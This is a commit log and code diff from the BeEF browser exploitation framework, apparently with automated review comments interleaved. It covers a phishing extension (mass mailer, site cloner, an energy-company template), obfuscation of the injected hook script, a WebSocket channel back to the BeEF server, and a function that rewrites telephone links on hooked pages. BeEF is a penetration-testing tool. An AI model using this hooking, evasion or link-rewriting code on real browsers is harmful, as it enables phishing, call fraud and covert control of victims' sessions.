
53 Commits

Author SHA1 Message Date
antisnatchor
69c59bb427 Social Eng. extension: moved the extension config line in main config file. 2012-09-07 17:21:17 +01:00
antisnatchor
4218f44203 Merge branch 'master' of https://github.com/beefproject/beef 2012-09-07 17:18:04 +01:00
bcoles
384fe7bcab Fix issue #741 2012-09-07 23:00:24 +09:30
bcoles
8625452751 Add support for Firefox 15 2012-09-07 20:30:19 +09:30
antisnatchor
0dd06d6ecb Merge branch 'master' of https://github.com/beefproject/beef 2012-09-07 08:41:13 +01:00
antisnatchor
5fc56a9dfa Social Eng. extension: added stub for mass_mailer DB structure 2012-09-07 08:41:02 +01:00
antisnatchor
6ac074d2b0 Social Eng. extension: now the web_cloner can serve modified pages as well. This is needed when the page use custom logic to submit the form. Added an example of an Edf Energy modified page. 2012-09-06 12:37:26 +01:00
antisnatchor
b3ae5f1016 Social Eng. extension: added EDG Energy template configuration in config.yaml 2012-09-06 11:30:33 +01:00
antisnatchor
64ba4686f4 Social Eng. Extension: added EDF Energy phishing template :D 2012-09-06 11:27:12 +01:00
antisnatchor
2f5fc46a8e Social Eng. Extension: fixed a bug in mass_mailer when choosing a different template. 2012-09-06 11:26:31 +01:00
Michele Orru
45b839d970 Merge pull request #740 from gallypette/master
Simple_hijacker module (Social engineering): Awesome, merging it straight away ;)
2012-09-06 02:07:42 -07:00
bcoles
085f2775f3 Added beef.browser.hasCors() function 2012-09-06 17:50:27 +09:30
Jean-Louis Huynen
716e7fe712 Change stupid code that made this module unusable with the API to something less stupid (i hope) 2012-09-05 15:16:21 +02:00
Jean-Louis Huynen
05d7fe3adf Adding the Simple Hijacker module in social engineering (route clicks on some links to javascript code) 2012-09-04 17:47:59 +02:00
qswain2
931aeb6ee5 Fixed the module count in the ui to include sub modules (issue 708) 2012-09-03 09:46:03 -04:00
antisnatchor
31387a0aa6 Social Eng. extension: massmailer -> calling IO.popen in a secure way 2012-09-02 19:00:40 +01:00
antisnatchor
d881852216 Social Eng. extension: added notes about 'wget' and 'file' commands required for the extension. 2012-09-02 17:26:38 +01:00
antisnatchor
ed9b1d5c2e Social Eng. Extension: webcloner ->calling IO.popen in a secure way 2012-09-02 17:25:50 +01:00
antisnatchor
ae72f9fedf Social Eng. extension: added request.ip to interceptor logs, adapted output 2012-09-02 16:23:53 +01:00
bcoles
ab588c0f68 Add link_rewrite_tel module
Fixes issue #721
2012-09-02 16:58:43 +09:30
antisnatchor
8eb0e2d973 Social Eng. Extension: Added DB structure and logic for web_cloner and interceptor. 2012-09-01 15:15:30 +01:00
Michele Orru
01ea6e4a04 Merge pull request #737 from gallypette/master
Added Whitespace Evasion technique!
2012-08-31 07:32:46 -07:00
antisnatchor
9b1cae6790 Added social_engineering extension to main BeEF config file. 2012-08-31 15:22:09 +01:00
antisnatchor
6b5302ef21 Social Eng. Extension: Added RESTful API calls for both mass_mailer and web_cloner 2012-08-31 14:08:08 +01:00
antisnatchor
a6a9af8483 Minor changes to main Server class (mounts need to be an instance variable) 2012-08-31 14:07:33 +01:00
antisnatchor
9ea0f60138 Social Eng. extension: added default PDF attachment to config.yaml 2012-08-29 22:48:45 +01:00
antisnatchor
6409b3d98f Social Eng. extension: mount point for phishing page is not configurable, refactored Interceptor initialization using config settings 2012-08-29 22:36:24 +01:00
antisnatchor
26c7696e0f Social Eng. extension: if the page can be framed, load it in an overlay iFrame maintaining the hook :D 2012-08-29 21:08:07 +01:00
antisnatchor
0260181d33 Social Eng. extension: added redirection after POST interception, refactored Interceptor class 2012-08-29 19:33:14 +01:00
antisnatchor
20d2e17232 Social Eng. extension: added support for SMTP servers that do not require authentication 2012-08-29 17:50:14 +01:00
antisnatchor
92b2382e25 Social Eng. extension: added support to specify attachments, added automatic MIME type guessing 2012-08-29 17:38:37 +01:00
Jean-Louis Huynen
e86712413c modified whitespace evasion technique to keep it simple - modified beefjs (just one line, i don't had much time to investigate my change but it seems to work better with it than without it :) 2012-08-29 18:22:22 +02:00
Jean-Louis Huynen
788cef08d3 add whitespace obfuscation technique - should work in theory - but does not in practice 2012-08-29 13:54:26 +02:00
antisnatchor
ffbd3d65b9 Social Eng. extension: various fixes, link/linktext/fromname configurable, adjusted various email headers 2012-08-27 21:30:09 +01:00
antisnatchor
df056fb688 Social Eng. extension: added configurable email templates 2012-08-27 16:10:40 +01:00
antisnatchor
26c86951a4 Social Eng. extension: added mass mailer 2012-08-27 14:30:10 +01:00
antisnatchor
558ca03ef6 Social Eng. extension: added basic structure and web cloner 2012-08-27 10:28:03 +01:00
antisnatchor
42c348f3f2 Added timeout.js that calls beef_init an fix some nasty cross-domain hooking issues when the hooking process was not started. 2012-08-25 10:26:16 +01:00
antisnatchor
b6c12fd0f3 Added copyright to are.js 2012-08-25 10:25:31 +01:00
bcoles
57f68725bc Moved lcamtuf download module to social engineering category 2012-08-25 18:54:15 +09:30
antisnatchor
50e7a1c206 Refactored WebSocket code. 2012-08-25 10:18:56 +01:00
antisnatchor
5400696c40 Refactored and modified beefjs.rb: splitted external lib files from beef files, added the feature for #734 to exclude some core lib js files (like jquery) from obfuscation 2012-08-25 09:58:25 +01:00
antisnatchor
7ed9516b53 Obfuscation: removed base64 from the default chain list, added excluded_core_js option 2012-08-25 09:55:53 +01:00
antisnatchor
aeb17e7d7a Changed target support to notify_all for lcamtuf download module (pop-up blockers) 2012-08-24 19:46:02 +01:00
bmantra
7c26ac6a1e Merge pull request #735 from bmantra/master
fixes #725 initial commit for lcamtuf download trick module
2012-08-24 11:27:25 -07:00
bmantra
f852ca26cb lcamtuf download module 2012-08-24 20:24:37 +02:00
Mike Haworth
5a9a050c1c added new phonegap modules, to check connection type (wifi/3g) and ensure beef hook survives suspend resume of app. 2012-08-22 20:51:49 +12:00
Mike Haworth
ad2bc95cf0 updated local file theft to accept custom file path 2012-08-22 20:50:03 +12:00
Mike Haworth
f2d4a88810 added abilty to detect new phonegap renamed 'cordova' 2012-08-22 20:48:55 +12:00
Wade Alcorn
6897962803 Version updated 2012-08-15 13:39:16 +10:00
sussurro
8c43fffb36 Fixed Twitter client to not cause errors on failed tweets allowing logins etc to continue 2012-08-12 19:27:19 -07:00
radoen
93bb25aa0b Set to false websocket and https 2012-08-10 13:47:42 +02:00
radoen
5697eac123 Added support for wss, issue #714 2012-08-10 13:43:48 +02:00
66 changed files with 2954 additions and 168 deletions

3
.gitignore vendored

@@ -1,3 +1,4 @@
beef.db
test/msf-test
custom-config.yaml
custom-config.yaml
extensions/social_engineering/web_cloner/cloned_pages


@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.6-alpha
0.4.3.7-alpha

11
beef

@@ -81,7 +81,7 @@ Socket.do_not_reverse_lookup = true
case config.get("beef.database.driver")
when "sqlite"
DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
when "mysql","postgres"
when "mysql", "postgres"
DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"),
@@ -124,12 +124,13 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
#@note Starts the WebSocket server
if config.get("beef.http.websocket.enable")
BeEF::Core::Websocket::Websocket.instance
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
if config.get("beef.http.websocket.secure")
print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
end
end
# @note Call the API method 'pre_http_start'
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
@@ -140,7 +141,7 @@ if config.get("beef.extension.console.shell.enable") == true
begin
FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
rescue Interrupt
end
else


@@ -16,16 +16,16 @@
# BeEF Configuration file
beef:
version: '0.4.3.6-alpha'
version: '0.4.3.7-alpha'
debug: false
restrictions:
# subnet of browser ip addresses that can hook to the framework
# subnet of browser ip addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
@@ -42,8 +42,9 @@ beef:
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
secure: false # use WebSocketSecure
port: 61985 # good success rate through proxies
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSS
alive_timer: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
@@ -68,7 +69,7 @@ beef:
# db_file is only used for sqlite
db_file: "beef.db"
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_name: "beef"
@@ -86,13 +87,15 @@ beef:
# You may override default extension configuration parameters here
extension:
requester:
enable: true
enable: true
proxy:
enable: true
enable: true
metasploit:
enable: false
console:
shell:
enable: false
social_engineering:
enable: false
evasion:
enable: false
console:
shell:
enable: false
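Review bot: The shipped default for `websocket.secure` appears to flip from `false` to `true`, although its own comment says WSS works only on HTTPS origins and with HTTPS support enabled in BeEF. With that default, turning on `websocket.enable` alone would also start the WSS listener and load the key and certificate named under `beef.http.https` (inferred from the WebSocket server change on this page), so a setup without those files may fail at startup. Keeping `secure: false` as the default and rewording the comment to `# use WebSocketSecure; works only on HTTPS origins and with HTTPS support enabled in BeEF` would avoid that. The first hunk also keeps `permitted_ui_subnet: "0.0.0.0/0"` active with the loopback value commented out, which leaves the admin UI reachable from any address by default.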


@@ -1,4 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.are = {
init:function(){
var Jools = require('jools');


@@ -188,12 +188,20 @@ beef.browser = {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
},
/**
* Returns true if FF15
* @example: beef.browser.isFF15()
*/
isFF15: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function() {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15();
},
/**
@@ -463,6 +471,7 @@ beef.browser = {
FF12: this.isFF12(), // Firefox 12
FF13: this.isFF13(), // Firefox 13
FF14: this.isFF14(), // Firefox 14
FF15: this.isFF15(), // Firefox 15
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -526,6 +535,7 @@ beef.browser = {
if (this.isFF12()) { return '12' }; // Firefox 12
if (this.isFF13()) { return '13' }; // Firefox 13
if (this.isFF14()) { return '14' }; // Firefox 14
if (this.isFF15()) { return '15' }; // Firefox 15
if (this.isIE6()) { return '6' }; // Internet Explorer 6
if (this.isIE7()) { return '7' }; // Internet Explorer 7
@@ -605,8 +615,8 @@ beef.browser = {
* Checks if the Phonegap API is available from the hooked domain.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasJava()) { ... }
*/
* @example: if(beef.browser.hasPhonegap()) { ... }
*/
hasPhonegap: function() {
var result = false;
try { if (!!device.phonegap) result = true; else result = false; }
@@ -614,6 +624,21 @@ beef.browser = {
return result;
},
/**
* Checks if the browser supports CORS
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasCors()) { ... }
*/
hasCors: function() {
if ('withCredentials' in new XMLHttpRequest())
return true;
else if (typeof XDomainRequest !== "undefined")
return true;
else
return false;
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
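Review bot: `hasCors` evaluates `new XMLHttpRequest()` without first checking that the constructor exists, so on a browser with no native `XMLHttpRequest` (the file still detects IE6) the call would throw a ReferenceError instead of returning false. Guarding the first test and collapsing the branches gives `return (typeof XMLHttpRequest !== "undefined" && 'withCredentials' in new XMLHttpRequest()) || typeof XDomainRequest !== "undefined";`. Separately, `isFF()` gains one more `|| this.isFF15()` term per release, and a single version-agnostic check would remove that maintenance step. The enclosing `beef.browser` object starts and ends outside these hunks.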


@@ -194,6 +194,31 @@ beef.dom = {
return count;
},
/**
* Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
* @param: {String} new_number: the new link telephone number to be written
* @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return: {Number} the amount of links found in the DOM and rewritten.
*/
rewriteTelLinks: function(new_number, selector) {
var count = 0;
var re = new RegExp("tel:/?/?.*", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
count++;
}
}
});
return count;
},
/**
* Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
* @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]


@@ -0,0 +1,26 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*
Sometimes there are timing issues and looks like beef_init
is not called at all (always in cross-domain situations,
for example calling the hook with jquery getScript,
or sometimes with event handler injections).
To fix this, we call again beef_init after 1 second.
Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
antisnatchor
*/
setTimeout(beef_init, 1000);
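Review bot: `setTimeout(beef_init, 1000);` is scheduled unconditionally, so on pages where the first `beef_init` call did run, the function runs a second time one second later. Whether `beef_init` is safe to call twice is not visible in this file. If it is not idempotent, a flag set at the top of `beef_init` and tested before the delayed call would make the retry harmless. The file comment should also say whether the 1000 ms delay was chosen empirically.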


@@ -27,15 +27,18 @@ beef.websocket = {
var webSocketPort = <%= @websocket_port %>;
var webSocketSecure = <%= @websocket_secure %>;
var protocol = "ws://";
if(webSocketSecure)
//console.log("We are inside init");
/*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
if(webSocketSecure && window.location.protocol=="https:"){
protocol = "wss://";
webSocketPort= <%= @websocket_sec_port %>;
}
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
} else {
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}
},
@@ -43,10 +46,10 @@ beef.websocket = {
start:function () {
new beef.websocket.init();
this.socket.onopen = function () {
//console.log("Socket has been opened!");
//console.log("Socket has been opened!");
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
//console.log("Connected and Helo");
beef.websocket.alive();
}
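Review bot: The hello frame in `start` is assembled by string concatenation, `'{"cookie":"' + beef.session.get_hook_session_id() + '"}'`, so a session id containing a quote or backslash would produce invalid JSON that the server-side `JSON.parse` rejects. Since json2.js is part of the bundle, `beef.websocket.send(JSON.stringify({cookie: beef.session.get_hook_session_id()}));` is the safer form. In `init`, the added `window.location.protocol=="https:"` test should use `===`, and the commented-out `//console.log("We are inside init");` line should be dropped rather than committed. The `beef.websocket` object continues outside both hunks.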


@@ -14,126 +14,151 @@
# limitations under the License.
#
module BeEF
module Core
module Handlers
module Modules
module Core
module Handlers
module Modules
# @note Purpose: avoid rewriting several times the same code.
module BeEFJS
# @note Purpose: avoid rewriting several times the same code.
module BeEFJS
# Builds the default beefjs library (all default components of the library).
# @param [Object] req_host The request object
def build_beefjs!(req_host)
config = BeEF::Core::Configuration.instance
# @note set up values required to construct beefjs
beefjs = ''
# @note location of sub files
beefjs_path = "#{$root_dir}/core/main/client/"
# @note we load websocket library only if ws server is enabled in config.yalm
# check in init.js
if config.get("beef.http.websocket.enable")
# Builds the default beefjs library (all default components of the library).
# @param [Object] req_host The request object
def build_beefjs!(req_host)
config = BeEF::Core::Configuration.instance
# @note set up values required to construct beefjs
beef_js = ''
# @note location of sub files
beef_js_path = "#{$root_dir}/core/main/client/"
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js)
else
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
# @note Load websocket library only if WS server is enabled in config.yaml
if config.get("beef.http.websocket.enable") == false
# @note BeEF libraries: need Eruby evaluation and obfuscation #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
else #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
end
end
ext_js_to_obfuscate = ''
ext_js_to_not_obfuscate = ''
# @note construct the beefjs string from file(s)
js_sub_files.each {|js_sub_file_name|
js_sub_file_abs_path = beefjs_path + js_sub_file_name
beefjs << (File.read(js_sub_file_abs_path) + "\n\n")
}
# @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
# @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
ext_js_sub_files.each{ |ext_js_sub_file|
if config.get("beef.extension.evasion.enable")
if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
# do not obfuscate the file
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
else
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
end
else
# Evasion is not enabled, do not obfuscate anything
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
end
}
# @note create the config for the hooked browser session
# @note construct the beef_js string from file(s)
beef_js_sub_files.each { |beef_js_sub_file|
beef_js_sub_file_path = beef_js_path + beef_js_sub_file
beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
}
hook_session_name = config.get('beef.http.hook_session_name')
hook_session_config = BeEF::Core::Server.instance.to_h
# @note create the config for the hooked browser session
hook_session_config = BeEF::Core::Server.instance.to_h
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
if hook_session_config['beef_public_port'] == '443'
hook_session_config['beef_url'].sub!(/http:/, 'https:')
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
if hook_session_config['beef_public_port'] == '443'
hook_session_config['beef_url'].sub!(/http:/, 'https:')
end
end
end
# @note Set some WebSocket properties
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
end
# @note populate place holders in the beef_js string and set the response body
eruby = Erubis::FastEruby.new(beef_js)
@hook = eruby.evaluate(hook_session_config)
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
else
@final_hook = ext_js_to_not_obfuscate + @hook
end
# @note Return the final hook to be sent to the browser
@body << @final_hook
end
# Finds the path to js components
# @param [String] component Name of component
# @return [String|Boolean] Returns false if path was not found, otherwise returns component path
def find_beefjs_component_path(component)
component_path = component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
return false if not File.exists? component_path
component_path
end
# Builds missing beefjs components.
# @param [Array] beefjs_components An array of component names
def build_missing_beefjs_components(beefjs_components)
# @note verifies that @beef_js_cmps is not nil to avoid bugs
@beef_js_cmps = '' if @beef_js_cmps.nil?
if beefjs_components.is_a? String
beefjs_components_path = find_beefjs_component_path(beefjs_components)
raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
beefjs_components = {beefjs_components => beefjs_components_path}
end
beefjs_components.keys.each { |k|
next if @beef_js_cmps.include? beefjs_components[k]
# @note path to the component
component_path = beefjs_components[k]
# @note we output the component to the hooked browser
@body << File.read(component_path)+"\n\n"
# @note finally we add the component to the list of components already generated so it does not get generated numerous times.
if @beef_js_cmps.eql? ''
@beef_js_cmps = component_path
else
@beef_js_cmps += ",#{component_path}"
end
}
end
end
end
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
end
# @note populate place holders in the beefjs string and set the response body
eruby = Erubis::FastEruby.new(beefjs)
@hook = eruby.evaluate(hook_session_config)
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
end
@body << @hook
end
# Finds the path to js components
# @param [String] component Name of component
# @return [String|Boolean] Returns false if path was not found, otherwise returns component path
def find_beefjs_component_path(component)
component_path = component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
return false if not File.exists? component_path
component_path
end
# Builds missing beefjs components.
# @param [Array] beefjs_components An array of component names
def build_missing_beefjs_components(beefjs_components)
# @note verifies that @beef_js_cmps is not nil to avoid bugs
@beef_js_cmps = '' if @beef_js_cmps.nil?
if beefjs_components.is_a? String
beefjs_components_path = find_beefjs_component_path(beefjs_components)
raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
beefjs_components = {beefjs_components => beefjs_components_path}
end
beefjs_components.keys.each {|k|
next if @beef_js_cmps.include? beefjs_components[k]
# @note path to the component
component_path = beefjs_components[k]
# @note we output the component to the hooked browser
@body << File.read(component_path)+"\n\n"
# @note finally we add the component to the list of components already generated so it does not get generated numerous times.
if @beef_js_cmps.eql? ''
@beef_js_cmps = component_path
else
@beef_js_cmps += ",#{component_path}"
end
}
end
end
end
end
end
end
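Review bot: In the new `build_beefjs!`, the websocket test changed from a truthiness check to `config.get("beef.http.websocket.enable") == false`, so an unset (nil) value now takes the branch that bundles websocket.js, the opposite of the previous behaviour. The two `beef_js_sub_files` lists are identical except for that one entry, and `config.get("beef.extension.evasion.exclude_core_js").include?(...)` would raise on nil if the option is missing (assuming `config.get` returns nil for unset keys). Building the list once and defaulting the exclusion list, as sketched below, covers all three. `find_beefjs_component_path` still mutates its argument in place through `gsub!`/`replace` and uses an unescaped dot in `/beef./`, which deserves a follow-up.

```ruby
# … unchanged: config, beef_js, beef_js_path, ext_js_sub_files …
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
# websocket.js is bundled only when the WS server is explicitly enabled
beef_js_sub_files << 'websocket.js' if config.get("beef.http.websocket.enable")
# timeout.js must remain the last file
beef_js_sub_files.push('are.js', 'timeout.js')

# default to an empty list so a missing option cannot raise on nil
excluded_core_js = config.get("beef.extension.evasion.exclude_core_js") || []
# … unchanged: ext_js_sub_files loop (using excluded_core_js), hook_session_config, Erubis evaluation …
```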


@@ -27,17 +27,156 @@ module BeEF
@@activeSocket= Hash.new
@@lastalive= Hash.new
@@config = BeEF::Core::Configuration.instance
#@@wsopt=nil
MOUNTS = BeEF::Core::Server.instance.mounts
def initialize
port = @@config.get("beef.http.websocket.port")
secure = @@config.get("beef.http.websocket.secure")
@root_dir = File.expand_path('../../../../../', __FILE__)
if (secure)
ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true,
:tls_options => {
:private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
:cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
}
}
# @note Start a WSS server socket
start_websocket_server(ws_secure_options, true)
end
# @note Start a WS server socket
ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")}
start_websocket_server(ws_options,false)
# #Thread for websocket-secure
# Thread.new {
# port = @@config.get("beef.http.websocket.secure_port")
# sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
# EventMachine.run {
#
# wsopt = {:host => "0.0.0.0", :port => port, :secure => true,
# :tls_options => {
# :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
# :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
# }
# }
#
#
# EventMachine::WebSocket.start(wsopt) do |ws|
# begin
# print_debug "New WebSocket-secured channel open."
# ws.onmessage { |msg|
# msg_hash = JSON.parse("#{msg}")
# #@note messageHash[result] is Base64 encoded
# if (msg_hash["cookie"]!= nil)
# print_debug("WebSocket-secured - Browser says helo! WebSocket is running")
# #insert new connection in activesocket
# @@activeSocket["#{msg_hash["cookie"]}"] = ws
# print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]")
# elsif msg_hash["alive"] != nil
# hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
# unless hooked_browser.nil?
# hooked_browser.lastseen = Time.new.to_i
# hooked_browser.count!
# hooked_browser.save
#
# #Check if new modules need to be sent
# zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
# zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
#
# #@todo antisnatchor:
# #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
# #Check if new forged requests need to be sent (Requester/TunnelingProxy)
# dhook = BeEF::Extension::Requester::API::Hook.new
# dhook.requester_run(hooked_browser, '')
#
# #Check if new XssRays scan need to be started
# xssrays = BeEF::Extension::Xssrays::API::Scan.new
# xssrays.start_scan(hooked_browser, '')
# end
# else
# #json recv is a cmd response decode and send all to
# #we have to call dynamicreconstructor handler camp must be websocket
# #print_debug("Received from WebSocket #{messageHash}")
# execute(msg_hash)
# end
# }
# rescue Exception => e
# print_error "WebSocket-secured error: #{e}"
# end
# end
# }
#
# }
#
##Thread for websocket
#Thread.new {
